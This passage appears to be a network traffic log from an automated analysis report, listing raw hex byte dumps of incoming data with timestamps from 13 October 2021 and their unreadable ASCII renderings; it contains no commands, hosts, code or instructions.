f5 04 9f 81 fe 3f a7 fc 0f 84 4d 18 e8 21 3c 8b 02 c1 fe 44 87 37 47 bf 68 2b bb 91 29 d2 73 ee 13 cf c0
                                        Data Ascii: +/OVpk''=M-q4FN?C|Y)u~m( 9j=pZ+\]\GpvI.h{"Si0&FGE]}*@^DJ"ivFFSR?7q1^'#q`DQNv@dSbM{nYK?M!<D7Gh+)s
                                        2021-10-13 14:33:05 UTC152INData Raw: 44 cf 14 88 e4 b6 52 72 71 98 d3 f9 6a e7 21 ff 11 eb 81 bd 0f 59 95 68 8b 15 46 0c 25 30 89 18 e9 f9 f5 13 e7 d3 2e 09 af b9 9d 8a 1b 99 6d c1 f7 b3 0f a7 98 32 f1 c8 04 f5 13 e4 40 7b 8a 73 14 ef e8 ec b2 fc 9a 4c 46 81 4f 72 b3 0c 59 a3 1a 4e 5f 85 3a ce 72 9a c5 e4 19 00 3e b7 c8 a4 e6 6d 53 1f aa 06 42 78 db 6f 0a 1f 68 da c5 6e c9 4f 75 e2 75 b1 bb 47 e6 4e 2a 1f 7f e1 2e 83 ac 9a 63 80 6a 35 bf 64 9e ee 8e 8e 2c 52 6b df 1d 86 2a 78 3c d9 86 43 93 12 3e 9d ec 1c f0 20 d4 5c 30 46 7d 0f 07 a0 00 06 e6 ee 3b bf 8f fc 19 e1 58 08 77 7c ac 21 7f f6 dc 12 97 af 3c 43 83 c0 0e 66 d3 a8 0e 84 cb ab ad bd 58 0b 3b d5 c7 88 60 db cb f9 65 6b 16 28 70 24 68 f2 aa 1c 46 c6 cf 96 85 21 ca b8 0e 6b 49 fa 3f 1a d0 eb fe 53 bf be 1c f0 35 37 b0 7a 13 99 a2 ef d5
                                        Data Ascii: DRrqj!YhF%0.m2@{sLFOrYN_:r>mSBxohnOuuGN*.cj5d,Rk*x<C> \0F};Xw|!<CfX;`ek(p$hF!kI?S57z
                                        2021-10-13 14:33:05 UTC153INData Raw: 03 2d bb b0 2a 29 62 67 20 77 83 ff c6 0f 6f 7c 9f f9 be 1e 1b e9 29 5a 46 0e 1c 54 47 85 c1 dc a4 8a fa 83 1d e7 46 bd 84 f9 cc a2 be dd 27 d1 15 e7 e8 11 4b 86 bc 33 47 3c 12 9d e7 40 9c b0 4e e9 0b 06 59 bd 6b 2a be 70 58 e7 3a 5e b1 ab f9 6e 7b 37 78 ed c1 4a e8 e7 6f 0e 68 82 4f f8 6b 25 2b a6 dd 23 94 6d 48 3c 4e 29 e4 30 77 35 20 e7 71 bd 84 80 92 7c ef 52 ed a2 83 04 4f a8 01 b7 ae f0 10 20 31 69 0c 3f eb 93 07 a8 a8 06 56 b2 09 e0 5d a5 0a 50 b6 f7 38 6f 71 e6 51 bd 33 9f 39 48 be b1 cc 4b 0d c3 b8 4c f1 c0 1d 43 a9 58 91 af 3f e5 3a 8f 77 ca 75 b4 4f 35 30 c6 a4 f7 c5 82 f5 d0 c0 83 9b be 36 d2 7a fa e0 65 af 1d 37 c3 d9 9b 24 4d 94 9b 11 31 b0 8e 42 a1 22 63 18 69 19 6c b8 c8 aa e9 cf c2 3a b3 09 b1 69 56 3f 6f 3b 97 e1 ce 9c 80 0e 78 a4 03 7f
                                        Data Ascii: -*)bg wo|)ZFTGF'K3G<@NYk*pX:^n{7xJohOk%+#mH<N)0w5 q|RO 1i?V]P8oqQ39HKLCX?:wuO506ze7$M1B"cil:iV?o;x
                                        2021-10-13 14:33:05 UTC155INData Raw: 98 6e fc 6b f1 3b 4a 28 14 98 64 a8 33 dd 65 33 b8 dd c9 d2 ea ff eb 06 fa a5 b0 d6 da b9 4b c4 0c 39 66 f7 0a 15 32 8e 04 86 b3 0f f8 66 5c 8f aa 89 72 f2 e5 04 0a db 8b b7 f9 4b a8 34 36 c4 34 f2 4c a3 17 55 3f fb f7 ea 15 63 72 c7 93 4f 99 6d a7 cc d4 67 78 d0 49 d3 37 6c 61 bc ff 47 cb 3a 3f 3f c6 19 53 b7 8f 20 4a 6c 0e 99 3b bd 32 17 34 ea 41 7f a0 4a 1c d6 72 ba 48 dc ea 1c f5 99 0d 5f 6e 28 73 05 9e fe 0b c1 e9 61 84 c9 43 8a c7 af 18 9b 62 c4 44 6b 55 bb 89 d0 77 05 07 34 a2 87 c7 39 e6 99 a1 18 af be ab a0 40 2c 84 13 c7 ff 68 a5 03 1a bb 67 e9 9d fb cc 7e be 21 2f 17 e3 03 b4 95 3d e3 0c 6a 12 0c b3 27 0c ef 2d a6 6f 48 5e 84 b0 4d c8 2f 0a b6 37 d6 4f b3 37 8d fa fd cb 86 da 77 c6 d7 2d 3f e0 4f 1b 04 f6 0e d4 8b d9 d3 09 9a cc 47 61 88 1f 28
                                        Data Ascii: nk;J(d3e3K9f2f\rK464LU?crOmgxI7laG:??S Jl;24AJrH_n(saCbDkUw49@,hg~!/=j'-oH^M/7O7w-?OGa(
                                        2021-10-13 14:33:05 UTC156INData Raw: 17 42 11 49 b0 29 c7 15 3b 72 7c 9f 69 a6 34 29 00 11 26 d0 c9 86 74 d5 b7 29 08 cf ec 05 0a 6f e9 4d a9 25 2e 90 c1 00 a6 0b aa 32 a4 55 6d 54 e4 fb 24 a1 5b 5a 20 e4 e5 5b 2c 63 5e 05 0d e8 80 65 40 8b d8 e4 b2 f2 c6 bb f8 4c 3b 09 dc af ff 08 2d 68 c6 cf 5a ec b0 ed f0 f4 e6 e5 05 76 32 5c 2e 56 34 94 37 c5 26 20 74 4c 62 77 52 ac 5e cb 3e 20 d7 95 3d 51 f6 d8 c0 bc 30 0d ae 69 47 e6 57 fb c7 c8 3a b3 bc 20 bf fb 76 f7 98 6f 6e 2d a0 a1 be ea 57 39 f3 7c 31 cc e2 8b 21 f6 55 f7 da c5 02 4e ac 1b ae dd b1 d4 ea 21 b2 ed ae db 27 e3 2e 52 b2 ad 47 91 06 d4 c3 b4 2a 05 c5 7d c0 95 d8 8b bf a8 e8 c9 a8 64 1d 96 28 65 da 97 7d de 4f c3 43 fc b0 48 52 bf 8b 8d 5e b1 51 87 33 87 f6 27 32 13 9c d8 0e 25 94 28 40 c9 8e 29 c2 62 62 e1 01 db 05 d7 70 d4 6a 84 94
                                        Data Ascii: BI);r|i4)&t)oM%.2UmT$[Z [,c^e@L;-hZv2\.V47& tLbwR^> =Q0iGW: von-W9|1!UN!'.RG*}d(e}OCHR^Q3'2%(@)bbpj
                                        2021-10-13 14:33:05 UTC157INData Raw: aa 2f 49 1d b6 e9 3d 14 10 f0 0e 7d 3a 34 55 1d f2 eb 33 39 60 50 50 30 fe 1a ff 34 10 20 1a 97 4b a6 23 36 65 10 ca 60 22 b0 5b 18 1c 1f e0 ef 61 fc da c9 39 1e 49 2e 61 95 67 a3 ac a7 9c 31 00 0c da 66 de 59 9a af c6 f2 5d a8 46 ea 06 bf de 28 46 52 4c 65 61 78 97 0b 75 3c 43 57 54 ac 35 fc da be 25 e8 e7 96 2d fc 63 40 f9 65 dc e7 03 36 41 b1 48 47 bb 94 06 4f 64 41 e7 1f 93 de 54 ce 66 ec 12 8f ec b0 44 57 42 ac c0 c4 56 36 f8 0c c2 2a 5a 50 e7 b1 5b b8 50 cd 8e 8a a9 fd 55 e3 0b 18 10 d1 2b 10 df b3 1d 0b 71 dd 4b f2 52 db e7 b7 16 a1 9f 25 be 8a 25 e5 1d ef 5d 66 8a 66 4c d0 c0 d7 95 ff be 6d 64 9e 52 53 a2 30 7f f9 40 07 44 cc 42 a8 16 f7 86 8e 7d 36 69 c4 ad de 85 3c 20 73 8a 55 0c 28 a5 14 67 09 71 e5 a6 52 ad 49 3b c0 3e 95 8e 69 d3 22 55 04 42
                                        Data Ascii: /I=}:4U39`PP04 K#6e`"[a9I.ag1fY]F(FRLeaxu<CWT5%-c@e6AHGOdATfDWBV6*ZP[PU+qKR%%]ffLmdRS0@DB}6i< sU(gqRI;>i"UB
                                        2021-10-13 14:33:05 UTC159INData Raw: 22 1c 8c b5 86 91 e7 8d 02 d5 db f9 db 3e 91 f0 28 8e 07 ce ed 32 1f 28 ce 8e 3a 47 26 28 a8 d7 ba b9 43 72 2b 4a 27 23 d1 fe f7 b0 2f db 3b 4d fc 80 46 46 a8 7c a8 94 48 de d2 b5 c3 41 66 9e 4f a8 d0 9f d1 2d c6 39 f3 94 f7 95 4a c9 42 91 9a b6 e0 bc 12 10 27 ad 04 0e 85 ae 06 38 cb bb ac 2e ea 1a f0 b7 41 3e fc 25 c9 16 d9 59 cb 94 ab 6a 65 ae 09 c1 cb b1 4e 5d b2 bf ee dc bd bc 79 25 f7 cf 45 5f a8 f8 9d 82 ce 95 3d 5e 2b 9b d4 94 7d 5e 36 64 54 c8 20 2b 74 7c 4d 71 67 a0 fb 98 e2 98 de a1 23 90 66 98 9d c0 f3 c3 d7 80 65 b5 3e c3 8e 58 1a fa e3 7a 7a 46 3f fc c7 35 a8 94 3f eb 49 78 31 c6 48 46 db 22 38 9a 00 72 ac a1 ee 0d 1b 70 25 83 a9 64 d4 bc 53 7f 06 b3 6c c4 17 4b 50 9d bc 33 83 08 6e 1e 75 06 cc 01 04 44 51 a7 54 a3 c8 10 3b d7 02 99 45 54 01
                                        Data Ascii: ">(2(:G&(Cr+J'#/;MFF|HAfO-9JB'8.A>%YjeN]y%E_=^+}^6dT +t|Mqg#fe>XzzF?5?Ix1HF"8rp%dSlKP3nuDQT;ET
                                        2021-10-13 14:33:05 UTC160INData Raw: 89 8a c3 28 8f b2 f1 30 99 f1 2e c6 13 4a a9 6d 42 a0 53 82 ab 17 8c 38 13 d6 1d 5c c4 f8 48 bb 05 d0 2f c5 f3 de e5 75 9e 2e eb b6 c1 2f 67 a5 ee 66 e0 03 88 48 ce 53 c9 0b a7 e4 56 95 a8 2c 5c 18 b2 cf 9b 7d 77 94 a1 be 50 9f e0 a4 cb d3 ef 14 11 c3 a7 a5 e1 e7 9c 5a bb 06 dc 88 84 bb 07 8b 68 a8 f3 cb 87 59 f8 ee 7e 93 a6 bb 4f 97 91 03 c7 d3 88 77 47 18 0d 43 ae 1e c7 77 65 1f c3 aa bd 49 f3 47 9a 22 38 5b 67 e1 0d ce 12 fb 06 26 b4 ec e8 ef c5 91 c5 11 fc d9 d5 8c d9 db 40 ac 3e 18 04 b3 62 68 5c e2 1d cb d5 7c 84 30 18 ef cd a2 04 94 bb 07 20 8e b3 88 bc 38 d2 26 40 a2 76 a5 3c bc 69 1f 37 83 83 e0 1b 6d 45 c1 9d 2e 88 6c 88 ff c2 5e 1c d8 77 f9 4d 23 2a 12 7f f7 4e a2 a5 ad 49 8a 86 76 26 96 8f 83 aa 30 9e 1a 84 b5 f7 60 dd c7 73 f0 d3 6e a6 a9 75
                                        Data Ascii: (0.JmBS8\H/u./gfHSV,\}wPZhY~OwGCweIG"8[g&@>bh\|0 8&@v<i7mE.l^wM#*NIv&0`snu
                                        2021-10-13 14:33:05 UTC161INData Raw: 04 22 01 b1 e6 6e 7e b4 bc e2 d8 4f b9 de 70 0b 3e e5 5b 0d db ca b2 40 b0 b1 52 eb 28 6a a4 7d 04 8b ea ea d9 b9 6c f6 bb f3 55 05 8d 21 89 8f 15 ee b6 96 87 ba 94 de 7e b7 3b 4c 0e 32 6d d4 e4 b5 93 04 34 29 21 67 29 ad 4b 52 2c 17 82 25 5c 8d 1f a4 5f 65 5e 70 56 9a e2 58 3a 54 7e c2 9b dd c8 34 52 a5 ca c1 f3 47 3b 74 78 e2 1c f5 81 0e 6e f5 b7 4b a3 77 4e ce 1b 02 63 12 96 b7 5c 9e 7d 08 77 0d ab 14 b1 24 50 08 75 86 1b 8b 50 53 1d 4a 19 99 fc d5 58 ee b3 6e 4b fa d7 39 3c 04 97 44 b8 36 7b ac f6 2a fc 2e 9c 53 d4 42 48 7b e8 cf 11 98 78 7e 02 85 82 7b 47 4d 78 0f 05 d4 a2 10 73 c1 df 02 14 17 0e 5e 13 b1 8b cd 22 41 07 e4 cb c5 37 29 b5 5b 59 0f 12 0b 4d 13 d7 92 d8 ac cb 6b 07 95 21 d5 2b 1e 60 23 5b 5a 7d 98 0e f0 48 7a c1 8a 3f 57 e5 e0 c0 d3 64
                                        Data Ascii: "n~Op>[@R(j}lU!~;L2m4)!g)KR,%\_e^pVX:T~4RG;txnKwNc\}w$PuPSJXnK9<D6{*.SBH{x~{GMxs^"A7)[YMk!+`#[Z}Hz?Wd
                                        2021-10-13 14:33:05 UTC162INData Raw: 1f 02 e5 8d a0 1b 5d 3b b8 d5 2d f4 c8 44 b2 d3 56 eb 8a cd 7a f1 07 b5 59 38 3f c9 85 d0 78 05 6c 3f bf 83 dd 09 f3 a8 98 24 bc fe ee 8e 14 15 e7 7d b5 8a 1b d7 72 75 80 76 a5 e5 d0 ac 2e e3 63 6e 47 9a 5c d3 8e 02 e3 21 4e 38 13 8e 17 3d 88 54 84 5f 23 2c 84 86 05 c2 58 7a eb a6 5e a0 38 da 0b 21 0f 08 3e 70 eb 7d 6a 93 90 41 f1 e6 aa 59 a9 03 43 2d 27 e4 69 3a b3 c7 08 d4 f6 7d 17 dc 91 58 13 70 0f e3 45 57 16 14 10 e8 da 9d 10 09 4a ab 18 08 35 ba e9 ca ee a2 ec 90 27 6a c2 c9 27 0d 5f 5d cf 3b 48 ed 99 b4 1c d3 d0 0d 0c 78 9b 6b 66 9a 35 f3 ec 2f b6 d0 16 2b 37 51 04 94 4c 19 54 94 8d 55 f6 42 7a cf 3b 63 14 03 17 44 1b 80 6c a8 c4 81 fa d7 4a 66 37 09 9e a2 86 ef d4 a8 04 c3 c3 e2 d4 2f 9e fc 38 bd 22 f1 de 97 cc dc 21 e3 6e 86 ea c0 19 27 69 76 16
                                        Data Ascii: ];-DVzY8?xl?$}ruv.cnG\!N8=T_#,Xz^8!>p}jAYC-'i:}XpEWJ5'j'_];Hxkf5/+7QLTUBz;cDlJf7/8"!n'iv
                                        2021-10-13 14:33:05 UTC163INData Raw: 97 17 b3 11 2d 08 b7 36 31 51 62 e8 f3 70 0e f0 c3 cf 7d 67 75 ba 8c c3 7e ed 91 e7 4a bf 80 71 d6 b2 43 43 af e5 17 6f 31 61 26 6f 1a 64 75 34 6b 53 81 c7 bb f4 37 09 ea 24 92 68 58 14 89 76 79 6e 7f 31 68 73 eb 44 bf 93 e2 04 4c 75 72 34 94 45 29 51 3e 9b 19 a1 ea de 0a 8a d0 79 04 ee 12 d2 76 13 ac 51 27 37 bc f7 0b 47 80 15 3e 8e 90 e3 c4 23 0b e0 7d 10 4b be 06 61 0b 02 ce f4 5b 65 35 a2 21 78 5e 74 57 a4 35 a1 5a 85 45 dc e3 37 99 ad 02 af 7b d9 e7 4c 6f b0 c2 45 37 28 41 71 c2 e8 80 4e c4 0d 64 e2 56 5a 55 93 13 a7 0d 62 f3 93 fc 88 9d 3c 94 cd e8 41 69 0e 1f 78 16 bf 2a 85 91 00 f1 d7 3e ff 88 69 a4 71 13 0a 1c db 70 ee 0d cb 5b 61 06 4e 0f da 6a 55 36 e9 7e b0 35 a4 6a 15 e8 01 da df 54 bd 8f 21 a6 15 64 cd 11 35 9a b5 c3 8b 03 e6 b9 fe f3 7a 9a
                                        Data Ascii: -61Qbp}gu~JqCCo1a&odu4kS7$hXvyn1hsDLur4E)Q>yvQ'7G>#}Ka[e5!x^tW5ZE7{LoE7(AqNdVZUb<Aix*>iqp[aNjU6~5jT!d5z
                                        2021-10-13 14:33:05 UTC164INData Raw: fe d3 f9 69 9a 3b 4b e7 d2 d1 c5 4d 56 b5 fc 2c 79 b9 7f 91 fe 22 46 19 c6 58 c6 87 0d 8a 23 7b df 54 a0 f0 bd 5f 8f ae 51 d4 be 21 8b 9c 0e b3 33 2d 9a cf 6e 43 fb 82 c8 78 54 90 67 97 32 f9 e5 0f 37 cc b6 57 df 11 e1 3d 36 e3 31 00 df 5c 12 83 21 bb 0a 2b 25 6b 63 94 c5 94 18 5e 0b ac c0 78 e8 e2 5f 05 ed 35 41 4b d1 70 1e 17 69 2e e1 d7 bb 53 6d f1 38 22 9a 6a c6 66 0b f1 56 66 04 9e 96 b7 5d 19 41 15 8f 5a ae 2b b8 09 01 98 b8 07 c6 a2 f5 a7 bf 0e 50 5f 5d 77 eb 55 31 c9 22 18 46 8f ee 92 ae 7d d7 d8 d1 c4 31 28 ed 5f 61 04 f1 09 ac 13 82 35 5c c6 8c 03 75 11 7d 46 ce a8 7d de f8 33 3a 4b af 2d 1a 19 53 48 a4 8c fc a4 41 b0 e7 58 47 7c e3 66 82 be f0 e7 d7 6d 3e 3a 90 73 55 0f 16 30 51 2e 96 f9 ce 44 bf 61 6a 66 19 e9 1d f5 f2 47 84 86 1a c0 ac a4 4b
                                        Data Ascii: i;KMV,y"FX#{T_Q!3-nCxTg27W=61\!+%kc^x_5AKpi.Sm8"jfVf]AZ+P_]wU1"F}1(_a5\u}F}3:K-SHAXG|fm>:sU0Q.DajfGK
                                        2021-10-13 14:33:05 UTC166INData Raw: d9 a0 46 65 f2 10 21 63 34 32 76 12 ab f1 da 0c 6c 52 c9 6c a2 09 10 0a 78 fc 2f 3d 3c f5 39 7c ab e3 99 22 b8 f9 6e dc 3e 25 db 98 a3 82 81 38 2b e1 64 91 c9 90 5f c2 ae 1c 19 ad 4c ce ee 4c 91 79 1c a3 08 0c 52 67 39 21 aa 63 48 b3 57 03 e3 ea b8 16 65 78 39 84 b4 32 d3 82 5f 7f 0a 1e 76 db 5c 5c 50 9b e9 1a b9 14 72 8b 72 09 c9 5e 06 82 60 ca 46 89 e7 0d 07 fa 3f bb 7b 3d 1c 9f 94 61 c8 18 31 7b d1 a3 64 32 94 a2 25 15 55 9f 20 d4 da 62 0e f2 88 59 a9 ac 81 2f f6 92 d2 1f e8 6f d2 65 d2 ee 85 80 30 f8 e4 7f 87 44 05 7a ff a7 03 91 23 18 98 3b 30 c6 a9 4e ba 75 64 11 e4 13 67 68 c4 cd 7f 16 1b 11 84 02 a0 12 b9 3d fc 0f 30 d1 e3 13 09 1c d9 f4 3e 35 68 48 42 7a d9 06 51 2f e5 cf a4 8f 8d a0 4c 19 61 26 13 3e b2 40 9a b0 07 23 9b d0 b7 df 59 6f 54 24 b5
                                        Data Ascii: Fe!c42vlRlx/=<9|"n>%8+d_LLyRg9!cHWex92_v\\Prr^`F?{=a1{d2%U bY/oe0Dz#;0Nudgh=0>5hHBzQ/La&>@#YoT$
                                        2021-10-13 14:33:05 UTC167INData Raw: 95 b3 74 f3 aa 19 b5 16 eb d6 36 a3 61 d0 89 c3 5b 62 c9 f0 30 59 83 94 a0 1c 27 72 c7 be 8d a5 e4 a5 13 23 79 81 88 cc 31 95 69 f2 35 80 fe 55 4c ce 3c 8d 75 fe e8 63 91 10 97 b9 c7 35 08 68 0c eb 71 ae e2 68 39 5e 3c 82 51 0c 29 41 56 aa 22 65 b1 6b bd f8 e0 3a 1f d5 2b 92 d6 9a 05 11 55 89 d4 57 a7 8d 73 d9 33 95 02 8d 83 dc 1e 23 b4 00 96 cd 4f 98 cb cb 79 9e 68 fb 95 54 bf 64 8e 8b 0d 04 fd e0 00 03 8b d3 13 30 e3 a6 08 58 41 14 9e b6 6d 38 be 22 c9 94 92 f7 ed 1d 5e cf ad f2 ad ee 7c 73 00 df 37 47 78 30 71 2c 08 6f f9 76 49 c4 4e 6b f1 af 86 a0 68 c0 7b fc 28 6f d6 03 9b 38 b0 6f a8 50 15 18 46 3e d5 be bd 97 9c 8a 05 c0 4d 01 a1 8d 11 56 b1 99 cf d8 55 36 c9 0f ab 6d 8d e8 93 3b 92 a9 7c d6 c6 a7 29 d4 44 63 04 06 0e 97 e3 84 8e ab c5 bf 01 73 fe
                                        Data Ascii: t6a[b0Y'r#y1i5UL<uc5hqh9^<Q)AV"ek:+UWs3#OyhTd0XAm8"^|s7Gx0q,ovINkh{(o8oPF>MVU6m;|)Dcs
                                        2021-10-13 14:33:05 UTC168INData Raw: 5b 9c 72 04 74 b2 c3 3b e0 8f 6e ee 40 be 29 be 67 64 58 ab 6e f9 a2 36 25 5b 84 3a 14 d8 f4 19 1d a2 b0 71 bf eb 20 0f af 7d b3 6a b9 50 c4 ca 05 2b d9 59 07 7a 62 65 15 db cf 2b 1a d1 6a 1d 3d 43 b1 be 6c fc e0 2f 70 36 33 f6 3b 97 c1 4f 0c 68 27 df f9 bf 08 10 98 e4 64 24 1c ab 3f 2e e0 a6 e2 99 ea 92 e9 ec dd 28 ea 66 89 b1 8a 91 ec b4 af 66 90 c9 33 6d d2 5b 1b be 27 50 de 74 12 91 a4 11 b3 1b 0d 9b a6 d6 33 b9 62 0c 89 7a 0e e1 eb a9 7a 70 76 dd 87 a5 79 13 f1 5d 7e 0a a6 72 d6 92 4b d6 84 e6 17 2f 77 72 0d 7d 1a da 5f 57 45 28 88 55 88 fb 7f 1b ea 3d ba 6a 73 1b 9e e3 6e df 65 e3 0b d3 f5 e4 a5 84 e2 ac 42 53 61 37 94 44 5f 8e 36 89 19 a6 fa 96 03 a8 d1 dd 19 f2 7e d4 76 d0 b8 13 17 a6 bd 17 20 16 b3 7f 4f e1 a1 05 ec 33 0b 0d 6c e6 5b ba 06 d4 57
                                        Data Ascii: [rt;n@)gdXn6%[:q }jP+Yzbe+j=Cl/p63;Oh'd$?.(ff3m['Pt3bzzpvy]~rK/wr}_WE(U=jsneBSa7D_6~v O3l[W
                                        2021-10-13 14:33:05 UTC169INData Raw: 21 dc 80 1c 57 05 b7 2a 1c 6b 32 e0 15 94 bd 10 6a 75 89 8a 4c be 6a 0f 6a 3a cd f5 55 15 26 26 10 bc 7b 0c 16 59 7b 08 f7 1a 8c 85 78 10 15 a2 24 29 ae 35 33 14 c4 e0 a9 e2 a9 55 ae 75 31 15 2c 48 e7 d1 04 ac 0c 99 40 68 12 71 b5 0a 8d a7 e1 79 77 e5 a6 b0 af 81 81 ca 49 9a d7 d1 a4 84 f3 64 cd 11 36 56 d7 4e 13 74 8b fe ab 90 1f fc 40 60 98 bf 90 67 f3 fe 10 e0 db b0 ac eb 63 88 0d 1b fe 1b fb 25 90 95 44 35 d4 d1 c5 3c 54 79 fc e4 7b 8f 75 80 f1 c3 47 19 c6 29 c4 55 0d 42 21 35 d4 ef af 84 be 5f 8f b3 51 00 be a9 92 a4 2b 42 31 9f 9b cf 6e ca f8 56 c8 ae 56 d5 6c 51 3d 2b e3 0f 37 d1 b6 83 df c4 e3 02 3d 2c 3e 2c c8 5c 12 9e 21 6f 0a fa 27 85 68 e8 ca ca 1b 31 91 ac c0 af e8 6d 46 47 c8 b3 41 5d c6 c4 3c 0a 69 f9 e1 4e a2 6b 48 e2 38 a2 99 e6 5c 7b 0b
                                        Data Ascii: !W*k2juLjj:U&&{Y{x$)53Uu1,H@hqywId6VNt@`gc%D5<Ty{uG)UB!5_Q+B1nVVlQ=+7=,>,\!o'h1mFGA]<iNkH8\{
                                        2021-10-13 14:33:05 UTC171INData Raw: 4a 66 37 16 9e 55 80 2f e4 ac 34 fd f6 d3 e7 1e a7 ef 38 79 23 43 da dd cc 6c 27 4e ed 86 ea f0 67 95 6c 8a 83 95 eb 23 d3 e2 0d 23 3d 6b f3 2c d5 68 14 57 b4 33 50 b4 76 4e 93 06 13 fa 10 2c be 71 9c 9a 10 75 32 c3 2a d3 18 f8 35 d4 b6 03 be 57 71 59 2b 6e e8 91 a1 09 83 cc 2c 3e d8 9c 0c 1c 22 b0 60 8c 7c cc ef 57 60 99 6a f1 47 c5 4a 05 3d ea ce 99 93 b1 6b 3f db 97 33 1b 51 6a 0b 0e d4 9d 43 f3 e8 ca 2f a0 2f 32 76 3b 81 f2 d8 10 78 f5 cd d3 bf 58 0a 99 64 64 32 2f 3c f7 27 24 ac c8 99 7a 88 e8 6c dd 3e d9 f1 05 90 73 90 c6 04 69 7a 91 c9 33 7c c1 ac 78 0d f4 43 f4 ec 15 8c a5 11 b3 0a 1e 52 24 31 41 a0 48 48 fd 64 0f e1 eb b8 69 6d 62 3d 75 a5 53 e7 c5 7e 7f 0a a6 63 c5 5e 70 57 32 f3 3d bb 85 57 0c 7d 1a cb 4c 06 b5 43 91 4f a2 e7 60 3d eb 3d ba 7b
                                        Data Ascii: Jf7U/48y#Cl'Ngl##=k,hW3PvN,qu2*5WqY+n,>"`|W`jGJ=k?3QjC//2v;xXdd2/<'$zl>siz3|xCR$1AHHdimb=uS~c^pW2=W}LCO`=={
                                        2021-10-13 14:33:05 UTC172INData Raw: 0f 6a 4b 9b 12 37 7e 38 33 28 1a 0a e8 01 d5 99 6f 7f 86 79 87 00 79 cb 55 a3 80 15 d9 8b 0b cd ab 9e e9 31 9a 67 12 73 4c ca 36 8c 4a 5d 4b e0 99 00 04 cf 54 ec 71 f8 67 e7 78 e4 37 b1 eb 13 13 fa 98 81 3c 57 13 b9 d5 47 3c 18 c1 5a 60 aa 54 6b 75 89 8b 4a 21 02 7b 9b 1e 82 35 40 51 27 26 10 ba 7d 93 2c 7e 55 2c a7 5e d6 c1 79 10 15 e6 20 2e f2 12 ab 32 94 e0 65 a6 a8 56 ae 73 2f 27 ae ac c0 f0 55 ac 0c dc 41 6b 12 37 b0 45 33 1c 10 5d 26 e5 aa f5 ae 82 81 8c 4c af de de 8e a5 a1 64 8d 54 37 55 d7 08 16 30 9c 5b 5a b4 4d fc 0c 25 99 bc 90 61 ed cc 41 1e f7 94 ff eb e3 cd 0c 18 fe 5d fe 6a 18 34 d3 13 87 d1 49 79 55 7a fc a2 7e ba c8 b0 4f e2 13 19 06 6c c5 56 0d 04 24 71 1e 75 1c a5 ea 5f 43 f6 50 03 be af 8c 96 0c af 7a bb ce cf 6e 8c f9 55 c8 e8 53 9a
                                        Data Ascii: jK7~83(oyyU1gsL6J]KTqgx7<WG<Z`TkuJ!{5@Q'&},~U,^y .2eVs/'UAk7E3]&LdT7U0[ZM%aA]j4IyUz~OlV$qu_CPznUS
                                        2021-10-13 14:33:05 UTC173INData Raw: 85 84 d5 d9 f4 16 3f b9 16 70 54 0f 16 a1 48 14 b3 d1 ef 23 be 31 ec 65 19 e9 1d 03 ec 7d a1 cb 39 a8 ad 1c c2 52 2e 67 e6 2a 7f b9 89 9c 59 8b 5e 0b 48 3a 64 14 03 16 06 bf cc 3d a9 b5 80 9e 5c 4b 66 37 05 8f a2 11 98 96 a5 45 ed 48 59 e6 1e a7 fc 2e bd b5 f4 48 d4 bd dc 95 6d ed 86 ea e3 61 3f 53 5f 81 bf 9a 87 79 6f 0c 23 3d 78 95 08 73 99 85 5c c5 ab ba 39 77 4e 93 15 15 75 2b b3 a5 5b ed 72 37 f9 33 c3 2a c0 7e 6c 65 58 a1 29 cf 67 26 d5 2a 6e e8 82 e5 27 13 8d c8 15 a9 f4 49 90 23 b0 60 9f 6d 39 aa 82 f7 b3 1b b9 94 49 4b 05 3d f9 d8 06 06 6b 42 31 aa cf 33 94 50 6a 0b 1d c2 b0 d3 65 c3 c4 5e 70 f2 bd 77 3b 81 e1 ce 0d fb 2f 8c dd cd 08 6c 17 65 64 32 3c 2a 3e b2 e8 e8 c6 ed ea be 79 6d dd 3e ca e7 88 36 82 f0 c8 70 f1 e2 00 c8 33 7c d2 aa 1d 8e 2e
                                        Data Ascii: ?pTH#1e}9R.g*Y^H:d=\Kf7EHY.Hma?S_yo#=xs\9wNu+[r73*~leX)g&*n'I#`m9IK=kB13Pje^pw;/led2<*>ym>6p3|.
                                        2021-10-13 14:33:05 UTC175INData Raw: 3d 73 e3 a2 43 e3 19 51 d1 d8 e3 94 ba 4e 0c d2 49 29 7f d4 4c 12 b5 0d 84 f0 87 42 9b c3 a2 f4 d9 c1 b3 68 ab 02 6c 29 ad dd c7 44 1f a5 c5 7a e1 86 7d 8d 7b 05 25 c5 aa 29 ef 70 bc db f6 00 5c 0f 6c 52 41 88 f6 d5 5e 4e e4 29 ea e9 01 d5 9f 76 bb 18 31 4d 67 04 cb 09 40 81 15 d9 8d 15 1c 55 58 f9 77 e7 6b f2 99 4d ca 36 8a 54 18 a2 c4 16 5e 79 8f 74 01 70 f8 67 e1 66 b3 8d 4e 94 76 6e b6 30 70 3d 57 13 bf cb 1a c3 3b bb 3e 1d 2a a4 48 75 89 8b 4c 2f 73 49 40 0c cd 48 cc 7d d5 27 10 ba 7b 8d 17 dd 7a f5 dc 23 16 69 8c 11 15 e6 26 30 ba b1 32 c1 ef 9d a9 ae 5f 57 ae 73 29 39 09 4e e3 fe 28 d1 0c 39 b7 6a 12 37 b6 4b 9e 33 cb 7f 54 98 a6 08 58 83 81 8c 4a a1 c4 fa 8e f0 df 19 cd a1 ce 54 d7 08 10 5e 83 14 b4 a6 1f 81 40 9c 61 bd 90 61 eb c2 2d 2b fc 55 ac
                                        Data Ascii: =sCQNI)LBhl)Dz}{%)p\lRA^N)v1Mg@UXwkM6T^ytpgfNvn0p=W;>*HuL/sI@H}'{z#i&02_Ws)9N(9j7K3TXJT^@aa-+U
                                        2021-10-13 14:33:05 UTC176INData Raw: b3 20 ce 39 55 32 c9 22 ac c9 8f bc 87 4a 91 aa 63 3e c4 32 28 ed 46 f3 04 11 0a 48 e3 ff 8e 57 c7 8f 03 75 fe f1 46 b2 bd 99 2a 85 88 1d 4a ac 2d 1a 5a c1 48 ae 8e 18 5c 3c 0b a4 59 45 7c e3 a4 0b be 10 ef 31 65 42 81 cf 72 56 0f 16 a7 c6 2e a8 fb 2a 50 c3 bd 12 67 1b e9 1d 02 62 47 67 8d fc db d0 78 de 50 2c 67 e6 2b e9 2e e0 8c bf f8 23 5b 72 38 66 14 03 17 90 48 ea 39 4f c6 fd fa 1c 49 64 37 05 9e 34 86 0b e3 60 36 90 f0 35 e4 1c a7 fc 38 2b 22 bf c9 11 ce a1 21 4c e9 84 ea e3 67 b1 69 a6 91 59 e9 fa d9 fd 09 21 3d 78 f3 9d e4 09 1d 9b b6 d6 42 